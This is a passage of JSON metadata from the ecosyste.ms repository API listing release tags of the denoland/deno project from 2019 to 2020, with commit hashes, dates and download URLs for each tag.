pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg